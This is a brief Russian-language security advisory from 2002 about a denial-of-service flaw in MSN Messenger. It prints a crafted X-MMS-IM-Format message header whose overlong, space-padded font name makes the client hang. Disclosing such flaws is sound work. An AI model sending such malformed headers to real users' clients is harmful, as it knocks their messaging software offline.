DoS против Msn Messenger

Дата публикации:	08.05.2002
Всего просмотров:	1075
Опасность:
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
Описание:	Msn Messenger - популярный интернет пейджер от Microsoft. Клиент зависает при получении некорректного описания шрифта в заголовке мгновенного сообщения. Клиент Msn Messenger посылает заголовок с каждым сообщением. Заголовок содержит информацию о шрифте, цвете сообщения и т.п. Обычно заголовок выглядит следующим образом: <start> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22 hey friend, how are you? <end> Теперь создаем заголовок с длинным именем шрифта: <start> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20 %20New%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20 Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; PF=22 hey friend, how are you? <end> Это сообщение вызовет зависания клиента Msn Messenger
Ссылки:	Misformated message header causes msn messenger to crash

DoS против Msn Messenger

Подпишитесь на email рассылку